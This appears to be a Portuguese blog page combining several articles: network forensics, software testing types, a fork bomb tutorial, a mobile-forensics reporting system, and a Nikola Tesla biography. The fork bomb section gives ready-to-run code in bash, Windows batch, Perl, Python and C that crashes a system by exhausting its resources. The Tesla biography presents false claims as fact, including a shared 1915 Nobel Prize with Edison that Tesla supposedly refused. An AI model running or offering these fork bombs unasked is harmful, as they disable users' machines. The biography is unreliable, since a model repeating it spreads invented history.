Avaliação do Usuário

Estrela inativaEstrela inativaEstrela inativaEstrela inativaEstrela inativa

Perícia Forense Computacional

 

A perícia forense computacional é uma coleta, preservação, análise e apresentação de evidências relacionadas a ambientes computacionais. As evidências recolhidas podem ser úteis em investigações de crimes cibernéticos ou até mesmo relacionadas ao campo da computação. Podem ser utilizadas como instrumentos de análise de vulnerabilidade em sistemas, bem como verificar o nível de utilização dos recursos computacionais pelos usuários. Em outras palavras, é o processo de análise metódica de dados, equipamentos e mídias, em busca de evidências que possam melhor detalhar atividades realizadas em determinado meio computacional.

o termo “perícia” significa “sabedoria, prática, experiência, habilidade em alguma ciência ou arte”, já o termo “forense” refere-se ao que vem “do foro judicial; dos tribunais ou a eles relativo”. Sob essa perspectiva, pode-se afirmar que “perícia forense” refere-se à utilização de conhecimentos e habilidades em determinada ciência aplicados em caráter judicial.

Com base nestas definições, podemos caracterizar perícia computacional forense como um ramo que combina elementos jurídicos e da ciência da computação. Esta junção visa coletar e analisar dados em sistemas, redes, bancos de dados e dispositivos móveis e dispositivos de armazenamento, possibilitando a apresentação de evidências em ambientes jurídicos, sindicâncias e processos de elucidação de práticas lesivas ao ambiente computacional, de forma geral.

Processo Forense

 

O processo pericial seja realizado baseando-se em quatro fases: coleta, extração, análise e documentação. Este processo básico aplica-se à perícia forense computacional de maneira geral, assim cabe sua utilização em perícia aplicada a redes.

Na fase da "Coleta", é adquirido dados que podem potencialmente conter evidências digitais, seguindo procedimentos que visem preservar a integridade dos dados e dispositivos.

Na fase da "Extração", é separado os dados adquiridos na fase da "Coleta", podendo ser informações de interesse particular, para isso é utilizado métodos forenses dos quais visam preservar a integridade da informação.

Na fase da "Análise", é viabilizado as informações adquiridas determinar adequadamente as raízes do incidente ou a impossibilidade de quaisquer conclusões face aos dados obtidos.

Na fase da "Documentação", é elaborar relatório técnico, com a finalidade de documentar e apresentar os resultados obtidos nas fases anteriores.

Tipos de Perícia Forense Computacional

 

A análise realizada em perícia forense computacional divide-se em dois tipos ou metodologias, que estão diretamente ligadas à volatilidade dos dados periciais.

Análise Post-Mortem

Análise realizada sobre dados não voláteis, localizados nas diferentes fontes. Esta análise prevê a cópia dos dados em mídia distinta, preservando-se as evidências originais, como forma de manter a integridade das provas, bem como permitir a eventual repetição da análise.

Análise em Tempo Real (Live)

Este tipo de análise consiste na coleta e análise de dados com alto índice de volatilidade, tais que o eventual desligamento da fonte de dados ocasione a perda destas informações. Como exemplos, pode-se citar a captura de estado da memória, lista de processos ativos, usuários conectados e conexões de rede, entre outros.

Perícia Forense Computacional Aplicada a Redes

A perícia computacional forense aplicado a rede é a ação utilizada para capturar, gravar e analisar auditoria de redes, com o intuito de descobrir brechas de segurança e outras informações relacionadas a problemas de segurança de redes.

O conceito básico de perícia forense em redes de computadores é trabalhar com dados encontrados em uma conexão de rede, analisando entradas e saídas de tráfego entre hosts e redes distintas. Mediante utilização de equipamentos de proteção, tais como firewalls e sistemas de detecção de intrusão (IDS), bem como dispositivos de rede, como roteadores, são gerados registros de dados trafegados (logs), que são utilizados em análises e procedimentos de perícia forense em redes.

Os objetivos destes procedimentos periciais são encontrar fontes de eventuais ataques e indícios de atos ilícitos na rede de dados, em caráter interno ou externo a esta, possibilitando envidar os devidos esforços necessários em âmbito jurídico e/ou administrativo.

Técnicas e Ferramentas

 

Sistemas de Perícia Forense de Redes

Os sistemas de perícia de redes em dois tipos: catch-it-as-you-can e stop-look-and-listen.

Os sistemas Catch-It-As-You-Can são aqueles onde todos os pacotes passam por um ponto de tráfego comum, sendo capturados e armazenados. Sua análise é realizada em sequência, em modo de lote. Esta forma de tratamento requer maior espaço de armazenamento.

Os sistemas Stop-Look-and-Listen são sistemas onde os pacotes sofrem uma espécie de triagem ou análise prévia, e somente algumas informações são salvas para análise futura. Este método requer maior poder de processamento para alcançar melhores resultados, vez que sua análise prévia ocorre em tempo real, conforme prevê o tipo de análise em tempo real (live), citado anteriormente.

Ferramentas de Análise Forense de Redes (NFAT)

As ferramentas de análise forense de redes (Network Forensic Analysis Tools - NFAT) permitem o monitoramento de redes, visando reunir informações sobre tráfego, auxiliando na investigação e colaborando na elaboração de respostas aos incidentes de segurança, de forma adequada. Auxiliam, ainda, na análise de intrusões e má utilização de recursos de rede, prevenção a possíveis ataques, avaliação de riscos, avaliação de desempenho da rede e proteção de propriedade intelectual.

Existem três funções básicas que as NFAT devem desempenhar, sendo elas: captura de tráfego, análise do tráfego capturado e interação entre o analista e a ferramenta.

Em conjunto com o firewall e o IDS, as NFAT viabilizam a preservação de registros de tráfego, possibilitando efetuar o levantamento de evidências, bem como caracterizar repetições e similaridades em momentos de ataques. Facilitando a organização dos dados capturados possibilitando descobrir padrões de tráfegos na rede.

Proposta de Roteiro de Investigação Pericial em Redes

 

Atualmente existem diversas propostas para os modelos investigativos utilizados na perícia forense de redes, o que pode ocasionar uma certa confusão nos iniciantes da área quanto à utilização dos modelos.

A investigação forense é composta por 5 passos, sendo eles: Início dos Trabalhos, Entradas, Processamento, Saídas e pôr fim a Finalização dos Trabalhos.

Na fase do Início dos Trabalhos, será efetuada a solicitação da investigação forense, logo em seguida será necessário a autorização e a preparação do ambiente para que a investigação seja iniciada.

Na fase das Entradas, é efetuada a extração dos dados, seja através de dispositivos móveis, dispositivos de armazenamento, etc., esses dados serão copiados de maneira que não possam ser alterados, mantendo a integridade das informações obtidas.

Na fase do Processamento, os dados obtidos serão analisados, passando por um cruzamento de informações, dos quais possibilitaram obter o máximo de informações relevantes para a investigação.

Na fase das Saídas, será apresentado os resultados do processamento, gerando laudos e documentos que validem a investigação.

Na fase de Finalização dos Trabalhos, a perícia estará validando os resultados da investigação forense, devolvendo os equipamentos e materiais recolhidos para efetuar a extração de informações e gerando um documento de encerramento da investigação forense.

Avaliação do Usuário

Estrela inativaEstrela inativaEstrela inativaEstrela inativaEstrela inativa

Abordagens de Testes

As duas abordagens de testes são: caixa preta e caixa branca. As duas diferenciam-se no nível e na forma de realização dos testes. Ambas são importantes e devem fazer parte de qualquer planejamento de testes de software.

Caixa preta (funcional): Os testes funcionais, ou teste de caixa preta, são gerados a partir de uma análise entre os dados de entrada e de saída, não se preocupando com a estrutura interna do software (código).

Caixa branca (estrutural): Testes de estrutura baseiam-se na no código-fonte do software. As ferramentas de diagnóstico analisam sintaticamente o código-fonte, procurando pontos fracos e erros estruturais e, normalmente, fornecem uma lista que permite tomar uma ação corretiva subsequente.

Estágios de Testes

Os principais estágios de testes são: unidade, integração, sistema e aceitação. Todos eles são importantes no processo de maturação do sistema.

Unidade: O teste de unidade verifica os menores elementos testáveis do software, sendo normalmente aplicado a componentes do modelo de implementação para verificar se os fluxos de controle e de dados estão cobertos e funcionam conforme o esperado.

Integração: O teste de integração é uma técnica sistemática para a construção de estruturas do programa realizando testes para descobrir erros ligados a interface. O teste de integração detecta imperfeições ou erros nas especificações da interface do pacote. Ao mesmo tempo em que as interfaces entre os módulos são testadas, sistematiza a atividade de integração dos módulos já submetidos ao teste de unidade.

Sistema: O Teste de sistema tem por objetivo comparar o sistema com seus requisitos iniciais. Não é o processo de testar as funções do sistema completo, porque isso seria redundante com o processo de teste funcional. O teste de sistema é o processo de tentar demonstrar como o programa, em um todo, não preenche os seus objetivos.

Aceitação: O teste de aceitação do "usuário" normalmente é a ação de teste final anterior à implantação do software. O objetivo do teste de aceitação é verificar se o software está pronto e pode ser usado pelos usuários finais para executar as funções e as tarefas para as quais o software foi criado. Eles são divididos em dois itens principais, os testes funcionais e os testes não funcionais.

Tipos de Testes

Com a necessidade de se criar software cada vez mais confiáveis, surgem a cada dia nova técnicas, como as de verificação e validação de sistemas. Existem vários tipos de testes, sendo eles:

Teste funcional: Este tipo de teste serve para verificar se todos os requisitos funcionais foram implementados de acordo com as regras do negócio. Assim, garantem que não haja diferença entre requisitos funcionais e o comportamento do software construído.

Teste de desempenho: Também chamado teste de performance, tem como principal objetivo verificar se o desempenho está consistente com os requisitos definidos, empregando um volume de transações nas situações previstas de pico máximo de acesso e concorrência, e tempo de resposta obtidos nos testes, e assim, compará-los com os valores limites especificados.

Carga: Verifica a aceitabilidade do comportamento de desempenho do objetivo do teste em condições operacionais variáveis enquanto a configuração permanece constante. Este teste submete o sistema à variação de carga de trabalho para avaliar e medir os comportamentos de performance e a sua capacidade de continuar funcionando sob diferentes cargas de trabalho com grandes quantidades de dados.

Stress: A ideia deste teste é “Estressar” o sistema ao ponto de encontrar erros. Ele verifica a aceitabilidade do comportamento de desempenho do objetivo do teste quando condições anormais ou extremas forem encontradas, como a redução dos recursos ou um número extremamente alto de usuários.

Teste de código: Este tipo de teste verifica se o código está de acordo com padronizações de linguagens, estruturação, endentação, nomes de arquivos, variáveis, funções, enfim, tem como objetivo deixar o código mais legível, reusável e bem estruturado.

Usabilidade: São testes que enfatizam fatores humanos, estética, consistência na interface do usuário, ajuda on-line e contextual, assistentes e agentes, documentação do usuário e material de treinamento. Seu objetivo é verificar a facilidade que o software possui de ser facilmente compreendido e manipulado pelo usuário.

Teste de segurança e controle de acesso: Estes testes são realizados para garantir segurança ao usuário efetuar login no sistema, limitar acessos aos dados disponíveis, assegurando que somente pessoas autorizadas poderão ter acesso a informações restritas.

Integridade dos dados: Testes destinados a avaliar a robustez do objetivo do teste (resistência a falhas) e a compatibilidade técnica em relação a linguagem, sintaxe e utilização de recursos. Esse teste é implementado e executado em vários objetivos do teste, como unidades e unidades integradas.

Teste de interface do usuário: O teste de interface do usuário verifica a interação do usuário com o sistema, tendo por intuito assegurar que a interface irá fornecer ao usuário o acesso e navegação adequados, além disso, o teste deve assegurar que os objetos contidos na interface funcionem como esperado.

Teste de instalação e configuração: O teste de instalação é efetuado para garantir que o sistema poderá ser instalado sob diversas circunstancias (instalação completa, atualização, etc.) e em diferentes plataformas verificando se logo após a instalação este funcionará corretamente.

Planejamento de Testes

O planejamento dos testes de produtos não triviais é complexo, envolvendo muitos aspectos técnicos e gerenciais. Neste é onde é definida uma proposta de testes baseando-se em custos, qualidade esperada, tempo, etc. Pode-se definir, assim, a equipe e o esforço que será colocado nos testes realizados neste sistema.

O plano de recursos é composto, neste caso, de dois papéis:

1. O analista de testes, tendo como suas funções identificar as ideias do teste, definir detalhes dos testes, determinar os resultados dos testes, documentar solicitações de mudança, avaliar a qualidade do produto, apresentar relatórios, defender os interesses do teste, verificar as técnicas de testes e definir os elementos de testabilidade;

2. O testador, que é o executor dos testes, registrando os resultados, analisando as falhas dos testes e possibilitando a recuperação posterior e documentando incidentes.

Os casos de testes tem o objetivo de identificar possíveis cenários dos quais necessitam ser testados. Essa análise pode ser feita de duas formas, sendo elas:

  1. A partir da decomposição de requisitos e estrutura interna.
  2. A partir do método de análise de documentos.

 

Avaliação do Usuário

Estrela inativaEstrela inativaEstrela inativaEstrela inativaEstrela inativa

Definição

Fork Bomb nada mais é do que um código que tem a capacidade de se auto replicar indefinidamente e, assim, tomar todos os recursos de memória e de processamento da máquina onde foi executado. Como os recursos das máquinas não são inesgotáveis, ele acaba por colapsar o sistema, a menos que medidas de correção sejam tomadas a tempo (o que é muito difícil de se fazer!).

Há relatos de que os primeiros Fork Bombs foram utilizados por estudantes da Universidade de Washington em 1969. O código em questão fazia duas cópias de si mesmo e se auto executava até que o sistema fosse derrubado.

Este tipo de código recebe o apelido de “rabbit job” (trabalho de coelho) ou “wabbit” em alusão ao personagem Elmer Fudd da Looney Tunes.

Antes de mais nada, é importante ressaltar que esse tipo de código deve ser utilizado apenas a fim de aprendizado. Seja responsável em suas atitudes!

 

Vamos por as mãos na massa!

Geralmente não é necessário ter privilégios de super usuário para se criar ou executar um Fork Bomb na maioria dos sistemas. Então, cabe ao administrador gerir os privilégios de cada usuário e como eles utilizarão os recursos disponíveis.

 

No Linux:

Abra o terminal e digite o comando abaixo.
:(){ :|: & };:

O seu funcionamento é o seguinte:

:() - Cria / define uma função chamada “:”.

{ :|: &} - Executa a função “:”, a coloca em segundo plano e direciona sua saída para a função “:”.

; - Serve como separador na linha de comandos (equivalente a &&). Permite rodar outro comando em seguida.

: - Executa a função “:”.

É possível desarmar a Fork Bomb em questão com o comando kill, mas você vai precisar ser rápido o suficiente para fazer isso antes que o sistema morra por inanição de recursos. Outra forma mais compreensível de obter o mesmo resultado é a seguinte:

bomb(){
 bomb | bomb &
 };
 bomb

O código acima torna torna mais fácil a compreensão do que está acontecendo. É possível notar como a função se executa e chama a si mesma. ;)

Um bom exemplo pra compreender o que está acontecendo sem quebrar seu sistema é o seguinte:

bomb(){
 echo “FORK BOMB”;
 };
 bomb

No Windows:

Crie um arquivo forkbomb.bat com o seguinte código:

:bomb
 start %0
 goto bomb

Ou apenas execute o comando abaixo:

%0|%0

 

Em Perl:

perl -e "fork while fork" &

 

Em Python:

import os
   while(1):
       os.fork()

Em C:

#include 
 int main(){
    while(1)
       fork();
  }

Se você gostou desse tutorial e gostaria de contribuir com seu código em outras linguagens de programação ou script, não deixe de comentar. Eu ficarei feliz em inserir seu código e dar os devidos créditos aqui. ;)

Avaliação do Usuário

Estrela inativaEstrela inativaEstrela inativaEstrela inativaEstrela inativa

O que é o SiCReT

É um sistema que visa uma padronização nos laudos Periciais, obtendo dados estatísticos, estruturação dos dados extraídos dos dispositivos móveis em um Banco Dados Relacional, organizado de modo a prover estruturas aptas à aplicação de técnicas e mineração de dados. Tem como destaque a customização para empresas que trabalham com análise Forense de dispositivos móveis, das quais podem ser subdivididos em: extração de características transformando dados brutos em estruturas de dados, interface web para visualização dos resultados obtidos, e, aplicação de técnicas de Mineração de Dados. Facilitando o tratamento e cruzamento de dados originários de diversos dispositivos apreendidos.

Dispositivos Móveis e Coleta de Dados Digitais

A Computação Móvel proporciona a capacidade de mover fisicamente serviços computacionais junto com os usuários, tornando os dispositivos computacionais sempre presentes, permitindo ao ser humano ter acesso aos recursos oferecidos por um sistema computacional independentemente da sua localização.

Os dados podem ser adquiridos através de duas maneiras, podendo ser de forma lógica ou de forma física. Adquirindo os arquivos de forma física, possibilita recuperar arquivos que foram apagados, proporcionando uma melhor análise dos dados.

Uma das principais técnicas forenses é adquirir os dados sem alterar seu conteúdo, deixando o arquivo somente com permissão de leitura, utilizando um equipamento denominado Write Blocker (ou bloqueadores de escrita), do qual gera um código Hash, possibilitando garantir a integridade das provas coletadas por ele, ou passadas para que ele as manipule.

Os dados a serem analisados podem ser adquiridos de diversas maneiras, porém existem instituições especializados em obter dados de dispositivos móveis, sendo dois deles o Cellebrite UFED e o Microsytemation XRY. O instituto Cellebite UFED contempla a totalidade de 7.900 dispositivos suportados, entre eles Smartphones, Tablets, etc. Quando um dispositivo apreendido não é suportado pelo instituto Cellebrite UFED, o aparelho é enviado para o instituto Microsystem XRY, do qual contempla a totalidade de 10.036 dispositivos suportados.

Os instituto de criminalística gera laudos dos quais proporcionam uma melhor analise da ocasião. Os laudos seguem o padrão XML, pois possibilita uma gama de dados, adotando padrões universais definidos pela W3C (World Wide Web Consortium).

Base de Dados

O sistema SiCReT utiliza da padronização da UML para representar soluções para sua base de dados, aplicações para mineração de dados e codificação na linguagem JAVA, possibilitando uma melhor compreensão da organização das informações.

Possibilitando atender as atividades dos peritos, a base de dados abrange as seguintes entidades: laudos, equipamentos, agenda, mensagens, chamadas, peritos, laudos_peritos, reus e arquivos.

Sistema SiCReT

O sistema de informações SiCReT tem como padrão de desenvolvimento o modelo MVC (Model-View-Control) que garante a separação da interface, do controle de fluxo e das regras do projeto, sendo que cada tipo de componente executa um determinado tipo de tarefa. Assim, é possível realizar alterações em cada uma das camadas isoladamente, diminuindo o retrabalho proveniente da necessidade de atualização em aplicações Web.

A segurança de um sistema desenvolvido utilizando a plataforma Java conta com um conjunto de pacotes disponibilizados por frameworks específicos, dentre eles citamos o JSSE (Java Secure Socket Extension) e o JAAS (Java Authentication and Authorization Service).

A estratégia de segurança imposta pelo Java é aumentada pelos recursos de segurança do sistema operacional no qual está sendo executada e reforçada pelo SGBD. Uma aplicação Java com uma estratégia de segurança pode tentar ler um arquivo em específico, mas se o usuário que está executando a aplicação não tiver permissão para o determinado arquivo, a aplicação Java não terá êxito.

Avaliação do Usuário

Estrela inativaEstrela inativaEstrela inativaEstrela inativaEstrela inativa

Nikola Tesla, nascido no final do império Astro-Húngaro, mais precisamente dia 10 de Julho de 1856, onde hoje é situado a Croácia.

Em 1877, Tesla ingressou na Universidade Politécnica Austríaca, do qual se formou em engenharia elétrica. Em debates com seu professor Nikola Tesla o questionou sobre os motores elétricos da época, que utilizavam sistemas de faíscamento, do qual gerava eletricidade tornando possível rotacionar o motor, porém esse conceito consisitia me uma grande perda de eletricidade, então com base na descoberta do princípio da indução elétrica de Michael Faraday, que descobriu que se temos um circuito elétrico em um campo magnético variável, uma corrente elétrica percorrerá o circuito através dos fios que fazem parte do mesmo, gerando o primeiro conceito de Corrente Alternada. Tesla questionou a possibilidade de usufruir esse conceito em motores, não teria muita perda de eletricidade, elevando a potência do motor, porém ele foi ridicularizado em público pelo professor do qual disse “Sr. Tesla, jamais conseguirá isso, pois se trata em um esquema de movimento perpétuo”.

No ano de 1880 Tesla se mudou para Budapeste, do qual começou a trabalhar no escritório central dos telégrafos, onde observando o pôr do sol, percebeu um campo giratório de energia do qual o levou a conclusão que conseguiria reproduzir esse efeito, energizando os enrolamentos de um motor em diferentes passos ou fases, simulando pistões de uma máquina, ocasionando em forças magnéticas de atração e repulsão rotacionando o rotor em seu próprio eixo, utilizando Corrente Alternada.

Em 6 de junho 1884, Nikola Tesla chegou de viajem para o Estados Unidos, com a ambição de conhecer o maior gênio da época, Thomas Edison. Nikola Tesla, trabalhou na Edison Machine, onde ficou responsável pela produção de dínamos e motores de corrente com promessa de pagamento de $50.000,00 dólares para que ele aprimorasse os geradores de energia, pois o maior problema de Corrente Contínua, é que a energia se perde com muita facilidade, mas na época isso não era um problema, pois o governo estava com o propósito de colocar um gerador elétrico a cada 2 quilômetros. Ao terminar o trabalho, Tesla foi até Edison solicitar que o pagasse, mas a atitude de Edison foi rir, o que irritou profundamente Tesla.

Em Maio de 1888, Tesla revelou ao mundo o primeiro motor de Corrente Alternada, do qual desenvolveu em um pequeno escritório que ficava a apenas alguns quarteirões do escritório de Edison.

No final dos anos 80 do século 19, Thomas Edison iniciou uma campanha para difamar os motores de Corrente Alternada desenvolvidos por Tesla e Westinghouse (Empresário que comprou todas as patentes de Tesla pelo valor de $1.000.000,00 de dólares, além de oferecer o valor de $2,50 por cada HP (Horse Power, equivalente a 746W) gerado por qualquer equipamento projetado por Tesla), esse evento se tornou conhecido como a guerra das correntes. Edison adotou como objetivo pessoal proibir completamente o uso da corrente alternada, pois segundo ele, a considerava desnecessária e perigosa. Com a tentativa de impor medo a população, Edison eletrocutava animais em praça pública utilizando a Corrente Alternada, chegou a matar até um elefante em uma de suas exibições.

A guerra das  Correntes teve fim em 1893, onde houve o primeiro festival do mundo que seria iluminado por eletricidade, a proposta de Edson para iluminar o evento foi de $1.000.000,00 de dólares, e de Tesla foi de $500.000,00 de dólares. Esse evento levou o famoso físico inglês Lord Kelvin a fechar um contrato com Tesla, do qual estaria utilizando as cataratas do Niagara para gerar energia.

Em 1896, o sistema entrou em funcionamento, dando início a era da eletricidade. Na virada do século, o cabeamento chegou a ter 540 quilômetros alcançando a cidade de Nova York.

Em 1892, Tesla foi convidado a apresentar os resultados de sua pesquisa em Londres, porém os espectadores ficaram assombrados com os resultados, pois pareciam mais uma demonstração de mágica do que ciência, dentre as apresentações estavam a Bobina de Tesla e a transmissão de eletricidade através de ondas eletromagnéticas.

Em 1893, Tesla se isolou em seu laboratório para se dedicar a pesquisas, do qual descobriu que bobinas enroladas poderiam enviar e receber “poderosas” ondas de rádio sintonizando-os para ressonar na mesma frequência. Em 1895, Tesla já era capaz de transmitir um sinal por 75 quilômetros produzindo cerca de 1 milhão de volts através de uma bobina cônica. No mesmo ano, em 15 de março, houve um terrível incêndio no prédio onde hospedava o laboratório de Tesla, do qual todo o trabalho fora perdido, o momento não poderia ser pior, pois na Inglaterra, um físico italiano chamado Guglielmo Marconi havia criado após intenso trabalho, um aparelho para telegrafia sem fio. Para evitar que Marconi se apossasse de suas ideias, Tesla abriu um novo laboratório, do qual “correu” para recomeçar e terminar seu trabalho perdido no incêndio, Marconi em 1897 era capaz de transmitir um sinal por cerca de 7 quilômetros, porém Tesla decidiu impressionar mais uma vez o mundo, em 1898 Tesla apresentou um simples barquinho controlado por controle remoto.

Em 1899 Tesla decidiu enviar uma onda de rádio até Paris para a convenção de Paris de 1900, então começou a estudar uma maneira de transmitir uma onda eletromagnética pela atmosfera, para isso estudou os raios, que transmitem eletricidade através do ar de um ponto a outro, o raio aquece a atmosfera do ar transformando-o em plasma o que proporciona a transmissão de energia da mesma forma que um fio de cobre, então Tesla começou a construção da maior bobina Tesla do mundo, com aproximadamente 45 metros.

Em 1900, Tesla escreveu um artigo para a Century Illustrated Magazine, da qual foi publicada no mês de Junho, neste artigo, Tesla tratava sobre o problema de energia do mundo, e propoz um sistema para captar energia do sol. Tesla no mesmo ano propôs um sistema para comunicação mundial sem fio.

Em busca de dinheiro Tesla processou Marconi por infringir suas patentes, pois a secretaria nacional de patentes dos Estados Unidos, decidiu revogar a patente de criação dada a Tesla para o rádio dando-a para Marconi, porém devido à falta de documentos, Tesla acabou desistindo do processo.

Em 1915 Tesla recebeu um prêmio Nobel juntamente com Thomas Edson, porém Tesla se recusou a dividir o prêmio com Edson, do qual foi entregue para o físico Willian Henry Bragg.

Em 1924, houve um rumor que na estadia de Tesla em Colorado Springs, Tesla havia criado uma máquina que disparava raios mortais pelo ar, do qual não houve nem uma confirmação por parte do inventor.

Em 1931, completando 75 anos, Tesla informou ao mundo que havia descoberto uma nova fonte de energia, da qual poderia ser utilizada para aniquilar exércitos e exterminas embarcações e aviões, batizando-a de raio da morte.

Tesla teve o fim de sua vida com 86 anos de idade no dia 7 de Janeiro de 1943 na cidade de Nova York, nos Estados Unidos, após sua morte, o governo dos Estados Unidos decidiu revogar grande parte das patentes de Marconi, pois as mesmas faziam parte da obra de Tesla.

 

Principais Invenções

  • Bobina de Tesla
  • Campo Magnético Rotativo
  • Canhão de Feixe de Partículas
  • Canhão Tesla
  • Carro eléctrico de Tesla
  • Corrente Alternada
  • Electrogravítica
  • Enrolamento Bifilar
  • Motor de Indução
  • Ondas estacionárias terrestres
  • Oscilador de Tesla
  • Ovo de Colombo de Tesla
  • Princípio de Tesla
  • Raio da Morte
  • Teleforça
  • Telegeodinâmica
  • Transmissão Sem Fios
  • Turbina de Tesla

 

 

Prêmios

  • Medalha Elliott Cresson (1894)
  • Medalha Edison IEEE (1916)
  • Prêmio John Scott (1934)
  • National Inventors Hall of Fame (1975)

 

 

Fontes:

FERREIRA, Roberto Leal. Minhas Invenções: A autobiografia de Nikola Tesla. São Paulo: Editora Unesp, 2012.